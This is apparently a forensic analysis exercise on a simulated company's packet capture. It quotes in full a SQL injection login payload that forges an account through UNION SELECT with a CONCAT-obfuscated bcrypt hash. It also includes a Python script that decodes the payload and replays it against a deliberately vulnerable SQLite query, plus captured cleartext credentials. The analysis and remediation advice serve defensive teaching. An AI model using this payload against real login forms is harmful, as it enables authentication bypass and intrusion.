<aside> 🎯 The Potenzio company asks you to analyze the attached PCAP and create a written report (2 pages suggested) detailing if some malicious activities occurred and a timeline of the related events.
They also provide a network diagram of their IT infrastructure (note that the Internet is simulated and uses a single public IP class 58.16.0.0/15).
Please organize the report applying the 5W1H method and briefly discuss if immediate remediation is available.
</aside>
The main conversations are:
58.16.101.101 is associated with the most active user in the simulated internet environment. This user frequently accesses various websites and services, including popular platforms such as Google, Instagram, Twitter, Facebook, eBay, Amazon, and LinkedIn, among others.
The IP addresses 58.16.102.183 (www.dagospia.com) and 203.0.113.1 (mail.potenzio.com) also appear in the capture, but only as destinations: they received packets and never sent any.
58.16.123.111 (**libre0ffice.com**, Linux) sent the majority of its packets in a single conversation with 192.168.100.101:80 (www.potenzio.com). It also submitted a login form to that server in which the username field is not a username at all but a SQL injection payload:

- Client: 58.16.123.111 [libre0ffice.com] (Linux)
- Server: 192.168.100.101 [www.potenzio.com]
- Protocol: MIME/MultiPart
- Username: `" AND 1=0 UNION ALL SELECT 'hacker',CONCAT('$','2','b','$','1','2','$',UPPER('X'),UPPER('M'),'1','x',UPPER('S'),UPPER('H'),'a','i','g','l','v','c',UPPER('S'),'p',UPPER('V'),UPPER('A'),UPPER('W'),'.','v','u','i','.',UPPER('F'),UPPER('B'),UPPER('P'),UPPER('O'),'1',UPPER('A'),'8','e','5','l','2','4','9','l',UPPER('Q'),UPPER('I'),UPPER('G'),UPPER('Y'),'0','8','7','f','l','3','s',UPPER('N'),'0',UPPER('F'),'i',UPPER('M'),'u') ,'notmymail', 1, 1; #`
- Password: pippo
- Valid login: Unknown; timestamp: 2023-05-15 09:39:33 UTC

The payload closes the double-quoted string around the username, makes the original WHERE clause false with `AND 1=0`, appends a fabricated user row with `UNION ALL SELECT` (username hacker, a bcrypt-formatted hash assembled one character at a time with CONCAT() and UPPER(), e-mail notmymail, and two id/flag columns set to 1), and comments out the rest of the statement with `#`, which is MySQL syntax. Spelling the hash out character by character keeps the literal hash string out of the request body, which is a common way to slip past pattern-based filters. If the application verifies the submitted password against the hash returned by this query, the attacker controls both sides of the comparison: the injected hash is presumably the bcrypt hash of pippo, so the login as hacker succeeds without any real account existing.
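As an added worked example (not part of the original report and not Potenzio's code), the following Python script decodes the CONCAT()/UPPER() obfuscation back to the hash string the database would have assembled, checks that it is bcrypt-shaped, and replays the UNION technique against an in-memory SQLite table that stands in for the unknown Potenzio user table. The table name, column layout, the shape of the application's query, the sample row for green, and the single-quote / `--` rewrite are assumptions made so the replay runs on SQLite (the captured payload is MySQL syntax); the payload, the password pippo and the host addresses come from the capture.

```python
"""Analysis of the SQL-injection login seen from 58.16.123.111 (added example)."""
import re
import sqlite3

# Username field submitted by 58.16.123.111 at 09:39:33 UTC, copied from the
# capture as reported above (the line wrapping is irrelevant to the SQL engine).
INJECTED_USERNAME = (
    "\" AND 1=0 UNION ALL SELECT 'hacker',CONCAT('$','2','b','$','1','2','$',"
    "UPPER('X'),UPPER('M'),'1','x',UPPER('S'),UPPER('H'),'a','i','g','l','v','c',"
    "UPPER('S'),'p',UPPER('V'),UPPER('A'),UPPER('W'),'.','v','u','i','.',"
    "UPPER('F'),UPPER('B'),UPPER('P'),UPPER('O'),'1',UPPER('A'),'8','e','5','l',"
    "'2','4','9','l',UPPER('Q'),UPPER('I'),UPPER('G'),UPPER('Y'),'0','8','7','f',"
    "'l','3','s',UPPER('N'),'0',UPPER('F'),'i',UPPER('M'),'u') ,'notmymail', 1, 1; #"
)
SUBMITTED_PASSWORD = "pippo"  # password field of the same request

# One CONCAT() argument: either UPPER('c') or a bare one-character literal 'c'.
_CONCAT_ARG = re.compile(r"UPPER\('(.)'\)|'(.)'")
# Shape of a modular-crypt bcrypt string: $2a/$2b/$2y, two-digit cost, 22+31 chars.
_BCRYPT = re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")


def decode_concat(payload: str) -> str:
    """Evaluate the CONCAT(...) in the payload the way MySQL would.

    The attacker spelled the value out one character at a time, some wrapped in
    UPPER(), so the contiguous hash string never appears in the HTTP request.
    """
    start = payload.index("CONCAT(") + len("CONCAT(")
    depth, end = 1, start
    while depth:  # find the ')' that closes CONCAT, skipping the UPPER(...) ones
        depth += {"(": 1, ")": -1}.get(payload[end], 0)
        end += 1
    out = []
    for upper, plain in _CONCAT_ARG.findall(payload[start:end - 1]):
        out.append(upper.upper() if upper else plain)
    return "".join(out)


def looks_like_bcrypt(value: str) -> bool:
    """True if the string has the length and alphabet of a bcrypt hash."""
    return _BCRYPT.fullmatch(value) is not None


def demo_users_db() -> sqlite3.Connection:
    """Stand-in for the Potenzio user table; schema and row are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, email TEXT,"
        " id INTEGER, is_admin INTEGER)"
    )
    con.execute(
        "INSERT INTO users VALUES ('green', '<placeholder-not-from-capture>',"
        " 'green@potenzio.com', 2, 0)"
    )
    return con


def lookup_user_vulnerable(con: sqlite3.Connection, username: str):
    """Assumed shape of the vulnerable query: the username is pasted into the
    SQL text. SQLite only accepts single-quoted strings, so the simulation
    quotes with ' where the real application evidently used \"."""
    sql = ("SELECT username, password_hash, email, id, is_admin FROM users"
           f" WHERE username = '{username}'")
    return con.execute(sql).fetchone()


def lookup_user_safe(con: sqlite3.Connection, username: str):
    """Same query with a bound parameter: the payload is just an odd name."""
    sql = ("SELECT username, password_hash, email, id, is_admin FROM users"
           " WHERE username = ?")
    return con.execute(sql, (username,)).fetchone()


def sqlite_equivalent_payload() -> str:
    """The captured payload rewritten for SQLite: decoded hash literal instead
    of CONCAT(), ' instead of \", '--' instead of MySQL's '#', and no ';'."""
    hash_literal = decode_concat(INJECTED_USERNAME)
    return (f"' AND 1=0 UNION ALL SELECT 'hacker','{hash_literal}',"
            "'notmymail',1,1 -- ")


if __name__ == "__main__":
    decoded = decode_concat(INJECTED_USERNAME)
    print("injected hash :", decoded, "bcrypt-shaped" if looks_like_bcrypt(decoded) else "")
    con = demo_users_db()
    print("vulnerable    :", lookup_user_vulnerable(con, sqlite_equivalent_payload()))
    print("parameterized :", lookup_user_safe(con, sqlite_equivalent_payload()))
```

The vulnerable lookup returns the fabricated row (hacker, the attacker's hash, notmymail, 1, 1) even though no such user exists, and a password check against that row is a check the attacker pre-arranged; the parameterized lookup returns nothing for the same input. Whether the decoded hash really verifies pippo cannot be confirmed from the capture alone; the `bcrypt` package's `checkpw()` would settle it. The remediation that follows from the replay is the usual one: bind parameters everywhere the application builds the login query.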
Another Linux host, 58.16.119.32, submitted a login to the same server with ordinary credentials (username green) about a minute before the injection attempt:

- Client: 58.16.119.32 (Linux)
- Server: 192.168.100.101 [www.potenzio.com]
- Protocol: MIME/MultiPart
- Username: green
- Password: green_password
- Valid login: Unknown; timestamp: 2023-05-15 09:38:15 UTC

Both credential sets are readable in the capture because the forms were submitted in cleartext, which is worth noting in the report alongside the injection itself.